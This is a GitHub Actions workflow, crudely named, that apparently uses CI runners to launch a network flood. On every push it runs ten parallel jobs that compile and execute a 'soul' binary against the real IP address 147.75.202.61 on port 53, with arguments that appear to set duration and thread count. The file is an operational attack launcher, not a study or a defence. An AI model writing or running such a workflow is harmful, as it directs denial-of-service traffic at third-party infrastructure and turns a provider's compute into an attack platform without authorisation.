name: soul fucker
on: [push]
jobs:
  stage-0:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        n: [1,2,3,4,5]
    steps:
      - uses: actions/checkout@v3
      - name: Compile and Run
        run: |
          # Agar soul.c file hai toh use compile karo, varna binary permission check
          if [ -f "soul.c" ]; then
            gcc soul.c -o soul -pthread
          fi
          chmod +x soul
          ./soul 147.75.202.61 53 10 100
  stage-1:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        n: [1,2,3,4,5]
    steps:
      - uses: actions/checkout@v3
      - name: Compile and Run
        run: |
          if [ -f "soul.c" ]; then
            gcc soul.c -o soul -pthread
          fi
          chmod +x soul
          ./soul 147.75.202.61 53 120 100
